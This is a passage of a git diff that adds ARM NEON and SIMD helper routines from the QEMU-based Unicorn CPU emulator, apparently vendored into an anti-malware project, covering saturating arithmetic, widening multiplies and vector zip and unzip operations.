HELPER(neon_paddl_u32)(uint64_t a, uint64_t b) +{ + uint32_t low = a + (a >> 32); + uint32_t high = b + (b >> 32); + return low + ((uint64_t)high << 32); +} + +uint64_t HELPER(neon_subl_u16)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ ~b) & 0x8000800080008000ull; + a |= 0x8000800080008000ull; + b &= ~0x8000800080008000ull; + return (a - b) ^ mask; +} + +uint64_t HELPER(neon_subl_u32)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ ~b) & 0x8000000080000000ull; + a |= 0x8000000080000000ull; + b &= ~0x8000000080000000ull; + return (a - b) ^ mask; +} + +uint64_t HELPER(neon_addl_saturate_s32)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint32_t x, y; + uint32_t low, high; + + x = a; + y = b; + low = x + y; + if (((low ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { + SET_QC(); + low = ((int32_t)x >> 31) ^ ~SIGNBIT; + } + x = a >> 32; + y = b >> 32; + high = x + y; + if (((high ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { + SET_QC(); + high = ((int32_t)x >> 31) ^ ~SIGNBIT; + } + return low | ((uint64_t)high << 32); +} + +uint64_t HELPER(neon_addl_saturate_s64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t result; + + result = a + b; + if (((result ^ a) & SIGNBIT64) && !((a ^ b) & SIGNBIT64)) { + SET_QC(); + result = ((int64_t)a >> 63) ^ ~SIGNBIT64; + } + return result; +} + +/* We have to do the arithmetic in a larger type than + * the input type, because for example with a signed 32 bit + * op the absolute difference can overflow a signed 32 bit value. + */ +#define DO_ABD(dest, x, y, intype, arithtype) do { \ + arithtype tmp_x = (intype)(x); \ + arithtype tmp_y = (intype)(y); \ + dest = ((tmp_x > tmp_y) ? 
tmp_x - tmp_y : tmp_y - tmp_x); \ + } while(0) + +uint64_t HELPER(neon_abdl_u16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, uint8_t, uint32_t); + DO_ABD(tmp, a >> 8, b >> 8, uint8_t, uint32_t); + result |= tmp << 16; + DO_ABD(tmp, a >> 16, b >> 16, uint8_t, uint32_t); + result |= tmp << 32; + DO_ABD(tmp, a >> 24, b >> 24, uint8_t, uint32_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_abdl_s16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, int8_t, int32_t); + DO_ABD(tmp, a >> 8, b >> 8, int8_t, int32_t); + result |= tmp << 16; + DO_ABD(tmp, a >> 16, b >> 16, int8_t, int32_t); + result |= tmp << 32; + DO_ABD(tmp, a >> 24, b >> 24, int8_t, int32_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_abdl_u32)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, uint16_t, uint32_t); + DO_ABD(tmp, a >> 16, b >> 16, uint16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_abdl_s32)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, int16_t, int32_t); + DO_ABD(tmp, a >> 16, b >> 16, int16_t, int32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_abdl_u64)(uint32_t a, uint32_t b) +{ + uint64_t result; + DO_ABD(result, a, b, uint32_t, uint64_t); + return result; +} + +uint64_t HELPER(neon_abdl_s64)(uint32_t a, uint32_t b) +{ + uint64_t result; + DO_ABD(result, a, b, int32_t, int64_t); + return result; +} +#undef DO_ABD + +/* Widening multiply. Named type is the source type. 
*/ +#define DO_MULL(dest, x, y, type1, type2) do { \ + type1 tmp_x = x; \ + type1 tmp_y = y; \ + dest = (type2)((int64_t)tmp_x * (int64_t)tmp_y); \ + } while(0) + +uint64_t HELPER(neon_mull_u8)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, uint8_t, uint16_t); + DO_MULL(tmp, a >> 8, b >> 8, uint8_t, uint16_t); + result |= tmp << 16; + DO_MULL(tmp, a >> 16, b >> 16, uint8_t, uint16_t); + result |= tmp << 32; + DO_MULL(tmp, a >> 24, b >> 24, uint8_t, uint16_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_mull_s8)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, int8_t, uint16_t); + DO_MULL(tmp, a >> 8, b >> 8, int8_t, uint16_t); + result |= tmp << 16; + DO_MULL(tmp, a >> 16, b >> 16, int8_t, uint16_t); + result |= tmp << 32; + DO_MULL(tmp, a >> 24, b >> 24, int8_t, uint16_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_mull_u16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, uint16_t, uint32_t); + DO_MULL(tmp, a >> 16, b >> 16, uint16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_mull_s16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, int16_t, uint32_t); + DO_MULL(tmp, a >> 16, b >> 16, int16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_negl_u16)(uint64_t x) +{ + uint16_t tmp; + uint64_t result; + result = (uint16_t)(0-x); + tmp = 0-(x >> 16); + result |= (uint64_t)tmp << 16; + tmp = 0-(x >> 32); + result |= (uint64_t)tmp << 32; + tmp = 0-(x >> 48); + result |= (uint64_t)tmp << 48; + return result; +} + +uint64_t HELPER(neon_negl_u32)(uint64_t x) +{ + uint32_t low = 0-x; + uint32_t high = 0-(x >> 32); + return low | ((uint64_t)high << 32); +} + +/* Saturating sign manipulation. */ +/* ??? 
Make these use NEON_VOP1 */ +#define DO_QABS8(x) do { \ + if (x == (int8_t)0x80) { \ + x = 0x7f; \ + SET_QC(); \ + } else if (x < 0) { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qabs_s8)(CPUARMState *env, uint32_t x) +{ + neon_s8 vec; + NEON_UNPACK(neon_s8, vec, x); + DO_QABS8(vec.v1); + DO_QABS8(vec.v2); + DO_QABS8(vec.v3); + DO_QABS8(vec.v4); + NEON_PACK(neon_s8, x, vec); + return x; +} +#undef DO_QABS8 + +#define DO_QNEG8(x) do { \ + if (x == (int8_t)0x80) { \ + x = 0x7f; \ + SET_QC(); \ + } else { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qneg_s8)(CPUARMState *env, uint32_t x) +{ + neon_s8 vec; + NEON_UNPACK(neon_s8, vec, x); + DO_QNEG8(vec.v1); + DO_QNEG8(vec.v2); + DO_QNEG8(vec.v3); + DO_QNEG8(vec.v4); + NEON_PACK(neon_s8, x, vec); + return x; +} +#undef DO_QNEG8 + +#define DO_QABS16(x) do { \ + if (x == (int16_t)0x8000) { \ + x = 0x7fff; \ + SET_QC(); \ + } else if (x < 0) { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qabs_s16)(CPUARMState *env, uint32_t x) +{ + neon_s16 vec; + NEON_UNPACK(neon_s16, vec, x); + DO_QABS16(vec.v1); + DO_QABS16(vec.v2); + NEON_PACK(neon_s16, x, vec); + return x; +} +#undef DO_QABS16 + +#define DO_QNEG16(x) do { \ + if (x == (int16_t)0x8000) { \ + x = 0x7fff; \ + SET_QC(); \ + } else { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qneg_s16)(CPUARMState *env, uint32_t x) +{ + neon_s16 vec; + NEON_UNPACK(neon_s16, vec, x); + DO_QNEG16(vec.v1); + DO_QNEG16(vec.v2); + NEON_PACK(neon_s16, x, vec); + return x; +} +#undef DO_QNEG16 + +uint32_t HELPER(neon_qabs_s32)(CPUARMState *env, uint32_t x) +{ + if (x == SIGNBIT) { + SET_QC(); + x = ~SIGNBIT; + } else if ((int32_t)x < 0) { + x = 0-x; + } + return x; +} + +uint32_t HELPER(neon_qneg_s32)(CPUARMState *env, uint32_t x) +{ + if (x == SIGNBIT) { + SET_QC(); + x = ~SIGNBIT; + } else { + x = 0-x; + } + return x; +} + +uint64_t HELPER(neon_qabs_s64)(CPUARMState *env, uint64_t x) +{ + if (x == SIGNBIT64) { + SET_QC(); + x = ~SIGNBIT64; + } else if ((int64_t)x < 0) 
{ + x = 0-x; + } + return x; +} + +uint64_t HELPER(neon_qneg_s64)(CPUARMState *env, uint64_t x) +{ + if (x == SIGNBIT64) { + SET_QC(); + x = ~SIGNBIT64; + } else { + x = 0-x; + } + return x; +} + +/* NEON Float helpers. */ +uint32_t HELPER(neon_abd_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = make_float32(a); + float32 f1 = make_float32(b); + return float32_val(float32_abs(float32_sub(f0, f1, fpst))); +} + +/* Floating point comparisons produce an integer result. + * Note that EQ doesn't signal InvalidOp for QNaNs but GE and GT do. + * Softfloat routines return 0/1, which we convert to the 0/-1 Neon requires. + */ +uint32_t HELPER(neon_ceq_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_eq_quiet(make_float32(a), make_float32(b), fpst); +} + +uint32_t HELPER(neon_cge_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_le(make_float32(b), make_float32(a), fpst); +} + +uint32_t HELPER(neon_cgt_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_lt(make_float32(b), make_float32(a), fpst); +} + +uint32_t HELPER(neon_acge_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = float32_abs(make_float32(a)); + float32 f1 = float32_abs(make_float32(b)); + return -float32_le(f1, f0, fpst); +} + +uint32_t HELPER(neon_acgt_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = float32_abs(make_float32(a)); + float32 f1 = float32_abs(make_float32(b)); + return -float32_lt(f1, f0, fpst); +} + +uint64_t HELPER(neon_acge_f64)(uint64_t a, uint64_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f0 = float64_abs(make_float64(a)); + float64 f1 = float64_abs(make_float64(b)); + return -float64_le(f1, f0, fpst); +} + +uint64_t HELPER(neon_acgt_f64)(uint64_t a, uint64_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f0 = 
float64_abs(make_float64(a)); + float64 f1 = float64_abs(make_float64(b)); + return -float64_lt(f1, f0, fpst); +} + +#define ELEM(V, N, SIZE) (((V) >> ((N) * (SIZE))) & ((1ull << (SIZE)) - 1)) + +void HELPER(neon_qunzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zd0, 2, 8) << 8) + | (ELEM(zd0, 4, 8) << 16) | (ELEM(zd0, 6, 8) << 24) + | (ELEM(zd1, 0, 8) << 32) | (ELEM(zd1, 2, 8) << 40) + | (ELEM(zd1, 4, 8) << 48) | (ELEM(zd1, 6, 8) << 56); + uint64_t d1 = ELEM(zm0, 0, 8) | (ELEM(zm0, 2, 8) << 8) + | (ELEM(zm0, 4, 8) << 16) | (ELEM(zm0, 6, 8) << 24) + | (ELEM(zm1, 0, 8) << 32) | (ELEM(zm1, 2, 8) << 40) + | (ELEM(zm1, 4, 8) << 48) | (ELEM(zm1, 6, 8) << 56); + uint64_t m0 = ELEM(zd0, 1, 8) | (ELEM(zd0, 3, 8) << 8) + | (ELEM(zd0, 5, 8) << 16) | (ELEM(zd0, 7, 8) << 24) + | (ELEM(zd1, 1, 8) << 32) | (ELEM(zd1, 3, 8) << 40) + | (ELEM(zd1, 5, 8) << 48) | (ELEM(zd1, 7, 8) << 56); + uint64_t m1 = ELEM(zm0, 1, 8) | (ELEM(zm0, 3, 8) << 8) + | (ELEM(zm0, 5, 8) << 16) | (ELEM(zm0, 7, 8) << 24) + | (ELEM(zm1, 1, 8) << 32) | (ELEM(zm1, 3, 8) << 40) + | (ELEM(zm1, 5, 8) << 48) | (ELEM(zm1, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qunzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zd0, 2, 16) << 16) + | (ELEM(zd1, 0, 16) << 32) | (ELEM(zd1, 2, 16) << 48); + uint64_t d1 = ELEM(zm0, 0, 16) | (ELEM(zm0, 2, 16) << 16) + | (ELEM(zm1, 0, 
16) << 32) | (ELEM(zm1, 2, 16) << 48); + uint64_t m0 = ELEM(zd0, 1, 16) | (ELEM(zd0, 3, 16) << 16) + | (ELEM(zd1, 1, 16) << 32) | (ELEM(zd1, 3, 16) << 48); + uint64_t m1 = ELEM(zm0, 1, 16) | (ELEM(zm0, 3, 16) << 16) + | (ELEM(zm1, 1, 16) << 32) | (ELEM(zm1, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qunzip32)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zd1, 0, 32) << 32); + uint64_t d1 = ELEM(zm0, 0, 32) | (ELEM(zm1, 0, 32) << 32); + uint64_t m0 = ELEM(zd0, 1, 32) | (ELEM(zd1, 1, 32) << 32); + uint64_t m1 = ELEM(zm0, 1, 32) | (ELEM(zm1, 1, 32) << 32); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_unzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zd, 2, 8) << 8) + | (ELEM(zd, 4, 8) << 16) | (ELEM(zd, 6, 8) << 24) + | (ELEM(zm, 0, 8) << 32) | (ELEM(zm, 2, 8) << 40) + | (ELEM(zm, 4, 8) << 48) | (ELEM(zm, 6, 8) << 56); + uint64_t m0 = ELEM(zd, 1, 8) | (ELEM(zd, 3, 8) << 8) + | (ELEM(zd, 5, 8) << 16) | (ELEM(zd, 7, 8) << 24) + | (ELEM(zm, 1, 8) << 32) | (ELEM(zm, 3, 8) << 40) + | (ELEM(zm, 5, 8) << 48) | (ELEM(zm, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_unzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + 
uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zd, 2, 16) << 16) + | (ELEM(zm, 0, 16) << 32) | (ELEM(zm, 2, 16) << 48); + uint64_t m0 = ELEM(zd, 1, 16) | (ELEM(zd, 3, 16) << 16) + | (ELEM(zm, 1, 16) << 32) | (ELEM(zm, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_qzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zm0, 0, 8) << 8) + | (ELEM(zd0, 1, 8) << 16) | (ELEM(zm0, 1, 8) << 24) + | (ELEM(zd0, 2, 8) << 32) | (ELEM(zm0, 2, 8) << 40) + | (ELEM(zd0, 3, 8) << 48) | (ELEM(zm0, 3, 8) << 56); + uint64_t d1 = ELEM(zd0, 4, 8) | (ELEM(zm0, 4, 8) << 8) + | (ELEM(zd0, 5, 8) << 16) | (ELEM(zm0, 5, 8) << 24) + | (ELEM(zd0, 6, 8) << 32) | (ELEM(zm0, 6, 8) << 40) + | (ELEM(zd0, 7, 8) << 48) | (ELEM(zm0, 7, 8) << 56); + uint64_t m0 = ELEM(zd1, 0, 8) | (ELEM(zm1, 0, 8) << 8) + | (ELEM(zd1, 1, 8) << 16) | (ELEM(zm1, 1, 8) << 24) + | (ELEM(zd1, 2, 8) << 32) | (ELEM(zm1, 2, 8) << 40) + | (ELEM(zd1, 3, 8) << 48) | (ELEM(zm1, 3, 8) << 56); + uint64_t m1 = ELEM(zd1, 4, 8) | (ELEM(zm1, 4, 8) << 8) + | (ELEM(zd1, 5, 8) << 16) | (ELEM(zm1, 5, 8) << 24) + | (ELEM(zd1, 6, 8) << 32) | (ELEM(zm1, 6, 8) << 40) + | (ELEM(zd1, 7, 8) << 48) | (ELEM(zm1, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zm0, 0, 16) << 16) + | (ELEM(zd0, 1, 16) << 
32) | (ELEM(zm0, 1, 16) << 48); + uint64_t d1 = ELEM(zd0, 2, 16) | (ELEM(zm0, 2, 16) << 16) + | (ELEM(zd0, 3, 16) << 32) | (ELEM(zm0, 3, 16) << 48); + uint64_t m0 = ELEM(zd1, 0, 16) | (ELEM(zm1, 0, 16) << 16) + | (ELEM(zd1, 1, 16) << 32) | (ELEM(zm1, 1, 16) << 48); + uint64_t m1 = ELEM(zd1, 2, 16) | (ELEM(zm1, 2, 16) << 16) + | (ELEM(zd1, 3, 16) << 32) | (ELEM(zm1, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qzip32)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zm0, 0, 32) << 32); + uint64_t d1 = ELEM(zd0, 1, 32) | (ELEM(zm0, 1, 32) << 32); + uint64_t m0 = ELEM(zd1, 0, 32) | (ELEM(zm1, 0, 32) << 32); + uint64_t m1 = ELEM(zd1, 1, 32) | (ELEM(zm1, 1, 32) << 32); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_zip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zm, 0, 8) << 8) + | (ELEM(zd, 1, 8) << 16) | (ELEM(zm, 1, 8) << 24) + | (ELEM(zd, 2, 8) << 32) | (ELEM(zm, 2, 8) << 40) + | (ELEM(zd, 3, 8) << 48) | (ELEM(zm, 3, 8) << 56); + uint64_t m0 = ELEM(zd, 4, 8) | (ELEM(zm, 4, 8) << 8) + | (ELEM(zd, 5, 8) << 16) | (ELEM(zm, 5, 8) << 24) + | (ELEM(zd, 6, 8) << 32) | (ELEM(zm, 6, 8) << 40) + | (ELEM(zd, 7, 8) << 48) | (ELEM(zm, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_zip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + 
uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zm, 0, 16) << 16) + | (ELEM(zd, 1, 16) << 32) | (ELEM(zm, 1, 16) << 48); + uint64_t m0 = ELEM(zd, 2, 16) | (ELEM(zm, 2, 16) << 16) + | (ELEM(zd, 3, 16) << 32) | (ELEM(zm, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +/* Helper function for 64 bit polynomial multiply case: + * perform PolynomialMult(op1, op2) and return either the top or + * bottom half of the 128 bit result. + */ +uint64_t HELPER(neon_pmull_64_lo)(uint64_t op1, uint64_t op2) +{ + int bitnum; + uint64_t res = 0; + + for (bitnum = 0; bitnum < 64; bitnum++) { + if (op1 & (1ULL << bitnum)) { + res ^= op2 << bitnum; + } + } + return res; +} +uint64_t HELPER(neon_pmull_64_hi)(uint64_t op1, uint64_t op2) +{ + int bitnum; + uint64_t res = 0; + + /* bit 0 of op1 can't influence the high 64 bits at all */ + for (bitnum = 1; bitnum < 64; bitnum++) { + if (op1 & (1ULL << bitnum)) { + res ^= op2 >> (64 - bitnum); + } + } + return res; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h new file mode 100644 index 0000000..ca4a189 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h @@ -0,0 +1,103 @@ +/* + * ARMv6 integer SIMD operations. + * + * Copyright (c) 2007 CodeSourcery. + * Written by Paul Brook + * + * This code is licensed under the GPL. 
+ */ + +#ifdef ARITH_GE +#define GE_ARG , void *gep +#define DECLARE_GE uint32_t ge = 0 +#define SET_GE *(uint32_t *)gep = ge +#else +#define GE_ARG +#define DECLARE_GE do{}while(0) +#define SET_GE do{}while(0) +#endif + +#define RESULT(val, n, width) \ + res |= ((uint32_t)(glue(glue(uint,width),_t))(val)) << (n * width) + +uint32_t HELPER(glue(PFX,add16))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD16(a, b, 0); + ADD16(a >> 16, b >> 16, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,add8))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD8(a, b, 0); + ADD8(a >> 8, b >> 8, 1); + ADD8(a >> 16, b >> 16, 2); + ADD8(a >> 24, b >> 24, 3); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,sub16))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB16(a, b, 0); + SUB16(a >> 16, b >> 16, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,sub8))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB8(a, b, 0); + SUB8(a >> 8, b >> 8, 1); + SUB8(a >> 16, b >> 16, 2); + SUB8(a >> 24, b >> 24, 3); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,subaddx))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD16(a, b >> 16, 0); + SUB16(a >> 16, b, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,addsubx))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB16(a, b >> 16, 0); + ADD16(a >> 16, b, 1); + SET_GE; + return res; +} + +#undef GE_ARG +#undef DECLARE_GE +#undef SET_GE +#undef RESULT + +#undef ARITH_GE +#undef PFX +#undef ADD16 +#undef SUB16 +#undef ADD8 +#undef SUB8 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c new file mode 100644 index 0000000..4e28af7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c @@ -0,0 +1,842 @@ +/* + * ARM helper routines + * 
+ * Copyright (c) 2005-2007 CodeSourcery, LLC + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include "cpu.h" +#include "exec/helper-proto.h" +#include "internals.h" +#include "exec/cpu_ldst.h" + +#define SIGNBIT (uint32_t)0x80000000 +#define SIGNBIT64 ((uint64_t)1 << 63) + +static void raise_exception(CPUARMState *env, int tt) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +uint32_t HELPER(neon_tbl)(CPUARMState *env, uint32_t ireg, uint32_t def, + uint32_t rn, uint32_t maxindex) +{ + uint32_t val; + uint32_t tmp; + int index; + int shift; + uint64_t *table; + table = (uint64_t *)&env->vfp.regs[rn]; + val = 0; + for (shift = 0; shift < 32; shift += 8) { + index = (ireg >> shift) & 0xff; + if (index < maxindex) { + tmp = (table[index >> 3] >> ((index & 7) << 3)) & 0xff; + val |= tmp << shift; + } else { + val |= def & (0xffU << shift); + } + } + return val; +} + +#if !defined(CONFIG_USER_ONLY) + +/* try to fill the TLB and return an exception if error. If retaddr is + * NULL, it means that the function was called in C code (i.e. 
not + * from generated code or from helper.c) + */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = arm_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (unlikely(ret)) { + ARMCPU *cpu = ARM_CPU(cs->uc, cs); + CPUARMState *env = &cpu->env; + + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + raise_exception(env, cs->exception_index); + } +} +#endif + +uint32_t HELPER(add_setq)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) + env->QF = 1; + return res; +} + +uint32_t HELPER(add_saturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { + env->QF = 1; + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint32_t HELPER(sub_saturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { + env->QF = 1; + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint32_t HELPER(double_saturate)(CPUARMState *env, int32_t val) +{ + uint32_t res; + if (val >= 0x40000000) { + res = ~SIGNBIT; + env->QF = 1; + } else if (val <= (int32_t)0xc0000000) { + res = SIGNBIT; + env->QF = 1; + } else { + res = (uint32_t)val << 1; + } + return res; +} + +uint32_t HELPER(add_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (res < a) { + env->QF = 1; + res = ~0; + } + return res; +} + +uint32_t HELPER(sub_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (res > a) { + env->QF = 1; + res = 0; + } + return res; +} + +/* Signed saturation. 
